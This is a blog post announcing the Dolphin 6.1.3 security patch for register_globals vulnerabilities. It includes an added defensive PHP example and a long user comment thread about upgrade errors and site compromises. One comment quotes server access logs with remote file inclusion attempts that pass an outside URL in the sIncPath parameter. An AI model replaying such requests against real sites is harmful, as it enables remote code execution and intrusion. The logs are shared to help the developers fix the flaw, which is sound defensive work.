VictorT

IMPORTANT. Dolphin 6.1.3 Security Patch Release

The Dolphin 6.1.3 Security patch is released. This patch fixes vulnerabilities that are exploitable when the PHP setting "register_globals" is on.

It therefore touches a large amount of code. The patch should be applied only to 6.1.2 (not to earlier versions) to move to 6.1.3, using these instructions. We recommend applying it even if you have already applied the solutions posted by other members here, as this patch is more comprehensive.

If you are upgrading step by step from an earlier version up to this latest release, please also make sure that "register_globals" is set to OFF on your host.
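The following is an added illustration, not Dolphin or BoonEx code, of what "register_globals" actually does to an application and of the two defensive habits the patch category implies: a runtime check that refuses to serve while the setting is on (with the php.ini and .htaccess spellings several commenters ask about), and initialising every flag and include path instead of relying on bare variables. The helper names and the `$bIsAdmin` / `$sIncPath` variables are constructed for the example; `header.inc.php` and `profiles.inc.php` are file names mentioned in the comments.

```php
<?php
// Added example (not Dolphin/BoonEx code). The function names and the
// $bIsAdmin / $sIncPath variables are constructed for illustration.

// 1. Detect the setting at runtime and refuse to serve while it is on.
//    ini_get() returns the raw php.ini string ("1", "On", "0", "Off", ""),
//    so it is normalised with filter_var(). On PHP 5.4 and later the
//    directive no longer exists and ini_get() returns false, which
//    correctly reads as "off".
function registerGlobalsEnabled()
{
    $sValue = ini_get('register_globals');
    return $sValue !== false && filter_var($sValue, FILTER_VALIDATE_BOOLEAN);
}

if (registerGlobalsEnabled()) {
    header('HTTP/1.1 503 Service Unavailable');
    // Fix on the host side: "register_globals = Off" in php.ini, or, with
    // mod_php and AllowOverride Options, "php_flag register_globals off"
    // in .htaccess. PHP accepts both "Off" and "0" as the ini value.
    exit('register_globals is enabled on this host; refusing to run.');
}

// 2. The bug class the setting enables. At file scope, with the setting on,
//    a request like index.php?bIsAdmin=1 creates $bIsAdmin = "1" before any
//    of this code runs, so a flag that is only assigned on success is bypassed.
//
//    VULNERABLE (hypothetical helpers; do not write this):
//        if (isAdminSession()) { $bIsAdmin = true; }
//        if ($bIsAdmin) { showAdminPanel(); }
//
//    HARDENED: initialise every flag first and read request data only from
//    the superglobals ($_GET, $_POST, $_SESSION), never from bare variables.
$bIsAdmin = false;
if (isset($_SESSION['admin_id']) && (int)$_SESSION['admin_id'] > 0) {
    $bIsAdmin = true;
}

// 3. Same rule for include paths. An uninitialised $sIncPath used in
//    require_once() could be supplied by the client (the sIncPath=http://...
//    requests in the access log quoted in a comment below have that shape).
//    Derive the base from the script location and whitelist the file name.
$sIncPath = dirname(__FILE__) . '/inc/';
$aAllowedIncludes = array('header.inc.php', 'profiles.inc.php');

function safeInclude($sIncPath, $sFile, array $aAllowed)
{
    if (!in_array($sFile, $aAllowed, true)) {
        return false;                         // not on the whitelist
    }
    $sFull = realpath($sIncPath . $sFile);    // resolves ../ and symlinks
    if ($sFull === false || strpos($sFull, realpath($sIncPath)) !== 0) {
        return false;                         // missing or outside inc/
    }
    require_once $sFull;
    return true;
}

safeInclude($sIncPath, 'header.inc.php', $aAllowedIncludes);
```

The runtime check is a safety net for hosts you do not control; the real fix remains turning the directive off server-wide, as the post recommends.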

Comments

LightWolf, 351 days ago
 
Awesome work Victor, thanks to all who created this wonderful software. I am installing the new Dolphin as we speak. Hope this stops most of those mean hackers... urghhh
 
jerry79, 351 days ago
 
Thanks Victor! But could you provide a diff of the files? Because my site is heavily modded, so I have to know what has changed from the original ones.
Or maybe I don't have to use this, because my register_globals is set to off; this means I don't need it, right?

Cheers,
Jerry
 
sammie, 351 days ago
 
Works like a charm, glad to see some of the bugs fixed too. Thank you team BoonEx, I know you worked hard to get this done as quickly as possible, and it was a huge job.

Just to clarify: although this patch makes Dolphin sites safer on hosts with register_globals on, BoonEx still recommends (as it is much safer all round) choosing a host with register_globals off.
 
Dwain, 351 days ago
 
Thanks Victor,

That was quick, easy and painless... now let's see what the hackers do to counter.
 
realmasterd, 351 days ago
 
Hello VictorT,

Many thanks from Germany!
 
TheGateKeeper, 351 days ago
 
I thank you also, Victor, for your efforts on behalf of us all.
 
Tango, 351 days ago
 
Big thanks for the patch....

On another but related subject... I checked my 'cache' folder and found a sub-folder named "PPP" which contains two files, "acct.php" and "index.html".

Are these normal? I have tried to download a copy and delete the files from my server, but I can't do it.

Also, I have deleted the files under the 'cache' folder just as my own security measure. Is this OK?

Please advise.
 
hakknslash, 351 days ago
 
I get the following error when I try to compile the ORCA language file. (I changed EVERY file and folder in ORCA to 777 and still get this message)

Warning: fopen(/MYSITE/orca/conf/params.conf): failed to open stream: Permission denied in /MYSITE/orca/inc/util.inc.php on line 263

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 36

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 37

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 38

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 39

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/classes/en/BxXslTransform.php on line 61
 
killerhaai, 351 days ago
 
I got the same errors as the first writer... and deleting the file you advised has no effect...
 
avhow, 351 days ago
 
Thanks for the patch. Can I also suggest you stop promoting Host For Web, since they have register_globals on by default.
 
jamesbowie, 351 days ago
 
Can you tell me where I can find the security patch, please? I cannot find the link anywhere.
 
avhow, 351 days ago
 
It's in the top blog post. They are calling it an upgrade from 6.1.2 to 6.1.3. It seems if you run an earlier version you aren't covered. For security reasons they recommend you have the latest version.
 
killerhaai, 351 days ago
 
OK, now I get strange things... I can't log in to my own admin center after the patch: not only the same errors as Hakknslash, but also with the admin login. I fill in my data and it says "waiting" and returns to the index.php login.

I use Firefox 3... Dolphin updated from 6.1.2 to 6.1.3 before the patch with no problems...
 
theguypc, 350 days ago
 
Thank you!
 
Synergy, 350 days ago
 
Thanks for the patch.
 
Stuart038, 350 days ago
 
I am getting this:

Warning: require_once(BX_DIRECTORY_PATH_INCprofiles.inc.php) [function.require-once]: failed to open stream: No such file or directory in /home/connect/public_html/admin/index.php on line 26

Fatal error: require_once() [function.require]: Failed opening required 'BX_DIRECTORY_PATH_INCprofiles.inc.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/connect/public_html/admin/index.php on line 26

And this under Orca

Warning: require_once(BX_DIRECTORY_PATH_ROOTgroups/orca/layout/uni/params.php) [function.require-once]: failed to open stream: No such file or directory in /home/connect/public_html/groups/orca/xml/config.php on line 89

Fatal error: require_once() [function.require]: Failed opening required 'BX_DIRECTORY_PATH_ROOTgroups/orca/layout/uni/params.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/connect/public_html/groups/orca/xml/config.php on line 89

Help!

Stuart
 
Stuart038, 350 days ago
 
and I cannot access Admin

Help!

Stuart
 
Evandromar, 350 days ago
 
Hello BoonEx staff, should I update my Dolphin to 6.1.3 even with register_globals off? I have doubts!
 
theGhost, 350 days ago
 
Thanks for the patch Victor.

I built a brand new Dolphin, upgraded all the way from 6.1.1 to 6.1.3, and had no problems. Forgot to update the header.inc.php and guess what error I got :) Updated language files, no problem. I am currently running RG_off.

When I did the upgrade on GGsite all went fine, but I am still being punched :) IT DID tweak the attack though... I'll send you the log file. Still no infections!
 
coolbuddy, 350 days ago
 
Do we need to apply this patch even if we download the latest version today and start a fresh website?
 
Stuart038, 350 days ago
 
Hello AndreyP

files are:
define('BX_DIRECTORY_PATH_INC', $dir['inc']);
define('BX_DIRECTORY_PATH_ROOT', $dir['root']);
define('BX_DIRECTORY_PATH_BASE', $dir['base']);
define('BX_DIRECTORY_PATH_CACHE', $dir['cache']);
define('BX_DIRECTORY_PATH_CLASSES', $dir['classes']);
define('BX_DIRECTORY_PATH_PLUGINS', $dir['plugins']);

Stuart
 
Stuart038, 350 days ago
 
Ok, problem solved!!

Stuart
 
Stuart038, 350 days ago
 
I forgot to upload the modified inc/headerinc.php file!!
 
gameutopia, 350 days ago
 
Thanks for the patch and update guys!! Just a thought though: not everyone reads the blogs or has email notifications. If a security update is involved you might consider other ways to push it to people. I've emailed a few people and they were not even aware of the last two patches or more, counting this one.

I am glad I do follow these blogs. Thanks for the updates!!
 
avhow, 350 days ago
 
The upgrades have busted my Orca CSS again, so all my line breaks have gone in all my Orca forum posts! Man, this is FRUSTRATING! Sometimes I feel like I'm banging my head against a wall.
 
Nighto2007, 350 days ago
 
Thanks Victor,

It's great... I upgraded my site successfully.

My site works fine.

Best regards,
Rawaf
http://www.a7lakalam.com
 
shaneed, 350 days ago
 
If my register_globals is OFF, do I have to apply this patch???
 
Juker, 350 days ago
 
Thanks Victor and the Boonex team,

Am I the only one or can we all sense the entire community coming together because of this problem? I am really proud to be a part of this movement.

Kudos to DosDawg who has been working tirelessly in the forums to help as many as he can.

Juker
 
crswsystem, 350 days ago
 
Hello Victor, I think the patch is great. Although we do not need this patch, I think it is very helpful for the many users who are on web space where it is difficult to use their server rights.
 
womenscafe, 347 days ago
 
I'm computer illiterate so Joombyte is doing the upgrade for me! Yipee!
 
Charisma, 347 days ago
 
Does this fix the problem with the v6.12 RSS feeds not working?
As far as I can tell it was something altered in the database.

I upgraded to 6.12 and my RSS feeds stopped working, does the 6.13 patch look at this problem?
 
Rob1960, 347 days ago
 
Hackers can leave files and folders behind that are almost impossible to delete. If you suspect these files, work with technical support of the ISP to get rid of these.
 
srisree, 347 days ago
 
Thanks
 
Rob1960, 346 days ago
 
I noticed that the Patch.zip file does not include a modified .htaccess file, nor is there a php.ini file to set register_globals off at the directory level. My provider says I must set register_globals off locally using a php.ini file. In terms of syntax, some have said to use register_globals = 0 and others say register_globals = off. Also, others have suggested modifications to the .htaccess file. Could someone post a modified .htaccess file that works for them, and if anyone needs to use the php.ini method for setting register_globals off, could they post a version of this file? Thanks very much.
 
anydude, 346 days ago
 
I'm pretty new here and I've added a few mods to my site. I've not applied any patches myself so far. Would these patches overwrite those mods which I've installed?
 
jdoedtman, 346 days ago
 
Dolphin dates on Blogs, RSS feeds & Events: I've applied the patch to 6.1.3 and now all of the dates on my postings are wrong. For example, Events show a date of "_day_of_9" when I check that the date is correctly set to 1 Sept 2008, and the same for Blog postings. RSS feeds show a date for the posts of "NaN".

Any ideas on how to fix this?

joe
 
cheluskin, 346 days ago
 
Yep, and they fixed the missing ?> in at least two files. And a lot of other things too. It would just be nice to know exactly what was added to or removed from the engine. Where can one see the change history?

P.S. Talking about security in the context of this engine is not appropriate, IMHO.
 
JacKsoN, 344 days ago
 
I made this update, but I have one problem with the Ray suite, which can't load; when I click on a Ray application I get an error message: "LOADING ERROR"
Before this update everything worked well.

Does anyone have an idea?
 
gregorscharff, 344 days ago
 
Dear VictorT

I am happy you released this one; we have been hacked also. I know we are a small community of artists (just 70 active), but we invite only artists who we think will come over with the huge wave of artists around the world, and we want to share and to show art. I was so tired of reintegrating all the modules, and maybe in the future you will really check up the stuff on the Expertzzz home to be sure the customers of your script do not run into a knife of "reinstalling", again and again, all their stuff which they paid for with money. Your script is great and I love it totally, but to rebuild our site I will wait, because I want to be sure we do not run again into this "black hole" of "reinstall".
My thoughts go to you, and I know much has happened here in your little world called BoonEx, but if you are a human among humans you will know what it means to say "to stay and keep cool".
Kind regards

Gregor Scharff
founder and CEO of Digital Renaissances Network
& an artist with the pure power of art

PS: maybe you could find a way, like modules, to create things that can be installed and uninstalled from the admin interface; it would be so helpful for integrating new options, or a package for the new stuff that can be removed easily if it makes problems. :) Take care and all the best to you and your team, who were always helpful for sure!!!!!!!!!!!!!
 
gregorscharff, 344 days ago
 
A note again: please check the RMS (not Ray) system, because I think we got from there an attack which works well in our system (vserver).
 
LightWolf, 344 days ago
 
I am having issues with the chat in the new Dolphin release, Dolphin-v.6.1.3-Free. All widgets work except the chat; it just continues to load but nothing happens. I have installed 2 times and get the same thing. I also tried using the chat from 6.1.2 and a separate Ray install, and that did not work. Is this just my issue or is it a Dolphin issue? Should I wait for Dolphin 6.2?
 
gregorscharff, 343 days ago
 
Maybe you could take a look at guestbook.php; someone now tries constantly to enter it:

Fri Jul 25 06:13:15 2008] [error] [client 195.58.3.163] File does not exist: /srv/www/vhosts/digital-renaicances.org/httpdocs/community, referer: http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add
[Fri Jul 25 06:13:16 2008] [error] [client 89.149.242.88] File does not exist: /srv/www/vhosts/digital-renaicances.org/httpdocs/community, referer: http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add

with different IPs

kind regards

gregor
 
gregorscharff, 343 days ago
 
And this is the access log from our server, but we have now installed everything new (just the OS, nothing more):

195.58.3.163 - - [25/Jul/2008:06:13:15 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.149.242.88 - - [25/Jul/2008:06:13:16 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
90.157.115.140 - - [25/Jul/2008:06:19:18 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.0" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.182.159.1 - - [25/Jul/2008:06:19:34 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.206.238.35 - - [25/Jul/2008:06:20:51 +0200] "GET /?sIncPath=http://www.doxgroup.com/egroupware/did.txt%0D?? HTTP/1.1" 200 7137 "-" "libwww-perl/5.803"
216.206.238.35 - - [25/Jul/2008:06:21:25 +0200] "GET /community/?sIncPath=http://www.doxgroup.com/egroupware/did.txt%0D?? HTTP/1.1" 404 1086 "-" "libwww-perl/5.803"
66.249.66.66 - - [25/Jul/2008:06:24:08 +0200] "GET /community/ray/ HTTP/1.1" 404 1086 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

He/she tries to enter, hahaha.

Hope it helps with fixing.
 
bss1, 340 days ago
 
On trying to compile the Orca language I am getting the error "Language files compilation have been failed. Please check folders permissions."

All level 1 folders under /orca/ are set to 777.

Same problem with /groups/orca/

Can someone please guide on solving this issue.
 
AGForknowledge, 331 days ago
 
I just uploaded the patch and now when I go to the index page I get this error:

Warning: Division by zero in /mysite.com/templates/base/scripts/BxBaseIndex.php on line 445
Error Database query error

This is line 445 ---> $pages = ceil( $num / $max_num );

Any ideas? Thanks for all you guys do!!
 
Juker, 330 days ago
 
My Site Is Being Hacked!

BEWARE - The patches do not work AND THE PROBLEM is not fixed!

I have 70 active members and on (8/3/08) Sunday night 10 members disappeared, on Monday night another 10 members disappeared, on Tuesday I began rebuilding and added 12 new members for a total of 62 and on Tuesday night 25 members disappeared. On Wednesday I removed all of the members except nine from my website and this morning (Thursday) one of the nine is missing.

I installed patch 6.1.3 with no error messages but when I installed the patch 6.1.4 I tried to recompile the language files but for /groups/orca or for /orca I get a "Failure To Recompile" error message and I can no longer recompile languages.

Can anyone help with the virus attack? The Dolphin patches are ineffective.

Thanks
 
Juker, 330 days ago
 
Attention Boonex Community - Hacker Alert!

No Password on your site is safe. My member passwords are being bypassed and all membership information is being systematically deleted. I have temporarily changed the status of my remaining existing members to unconfirmed and the hacker cannot see them. Change your memberships to unconfirmed until this hacker attack is eliminated.

I want to give the Boonex team the benefit of the doubt. I think they are working hard to beat down these hackers and my problem may be a new problem not covered by the patches.

Juker
 
beatlemanu, 316 days ago
 
Has this problem been solved yet?
 
Profesize, 301 days ago
 
Juker's problem sounds more like database pruning and not a virus.

Go to the Admin panel>Settings>Database pruning>Clean old profiles by last log in ( days ) and set it to something like 3000 otherwise it will delete your older profiles automatically.

Hope that helps.


Prof.
 